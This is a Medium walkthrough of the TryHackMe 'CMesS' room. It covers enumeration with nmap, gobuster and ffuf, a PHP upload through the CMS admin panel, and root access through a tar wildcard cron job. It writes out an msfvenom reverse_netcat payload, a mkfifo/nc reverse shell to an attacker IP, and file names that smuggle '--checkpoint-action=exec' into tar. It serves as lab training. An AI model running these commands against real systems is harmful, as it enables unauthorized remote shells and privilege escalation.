TryHackMe: CMesS

Today we will take a look at TryHackMe: CMesS. Please try to understand each step and take notes.

Enumeration/Scanning

> Nmap

Command: sudo nmap -sS -sC -sV -oN nmap/initial IP

> Gobuster

Command: gobuster dir -u http://cmess.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Let’s look at the admin panel

I had no idea. Until I think of looking at the subdomain.

>FFUF

Command: ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cmess.thm/ -H “Host: FUZZ.cmess.thm” -fw 522

Note: I used the “-fw” command to filter the same ones.

When we look at the page, we find important information that we need to access the admin panel.

Boom. We are already on the panel. Let’s get the reverse shell.

Exploitation

Administration> Themes> Gila Blog (folder icon)> And a few steps back.

I put index.php myself to make it easier.

Perfecto

Let’s look at the home directory first.

Excellent. We need permission. It’s time to launch linpeas.sh. Let’s go to the / tmp folder

For some reason, when I saw the file with the extension .tar.gz, I checked the crontab.

Excellent. But we have a problem. We don’t know Andre’s password.

Let’s start Linpeas.

Command: chmod +x linpeas.sh

Command: ./linpeas.sh

Look at the results.

Let’s check.

We found the password. Let’s go to the backup file

Privilege escalation

I researched from various sources. But I used this source.

Let’s get the reverse shell.

Create the payload first.

Command: msfvenom -p cmd/unix/reverse_netcat lhost=IP lport=4444 R

Let’s go to the backup file, create the script and listen.

Command: echo “mkfifo /tmp/prrcdw; nc IP Port 0</tmp/prrcdw | /bin/sh >/tmp/prrcdw 2>&1; rm /tmp/prrcdw” > shell.sh

Command: echo “” > “ — checkpoint-action=exec=sh shell.sh”

Command: echo “” > — checkpoint=1

Command: nc -nvlp 4444

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store